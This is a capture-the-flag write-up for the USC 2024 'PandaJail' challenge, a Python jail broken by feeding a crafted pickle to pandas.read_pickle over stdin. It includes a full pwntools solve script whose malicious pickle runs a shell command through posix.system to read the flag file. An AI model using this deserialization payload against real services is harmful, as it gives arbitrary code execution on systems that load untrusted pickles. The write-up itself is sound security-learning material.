[USC 2024] PandaJail

description

the actual description reads: “im stuck in a Pickle, can you help me out of jail?”

this challenge was pretty fun and took me a while to solve due to the challenge being completely blackbox. the challenge gave users a python shell and the ability to execute one command. there is a strict whitelist that only allowed for the sys and pandas module to be executed, anything else would be denied. there was also a blacklist on the amount of special characters that could be used.

clearly based on the description we needed to do something with pickle deserialization to get code execution. but how we get there is the problem.

writeup

to exploit the application we put together a pickle, then use our one command to read the pickle from stdin as demonstrated in solve.py

solve.py

#!/usr/bin/env python3

from pwn import *
import pickle
import posix

context.log_level = "critical"

p = remote("0.cloud.chals.io", 17738)
p.recvuntil(b">>>")
v = "pandas.read_pickle(sys.stdin.buffer)"
p.sendline(v.encode("utf-8"))

class payload:
    def __reduce__(self):
        return (posix.system, ('cat /flag.txt',))

payload = pickle.dumps(payload())
p.send(payload)

result = b""
while True:
    try:
        result += p.recv()
    except:
        break

if b"Nope" not in result and b"Wrong" not in result:
    print(v)
    print(result.decode())
else:
    print(result)
    print("bad", v)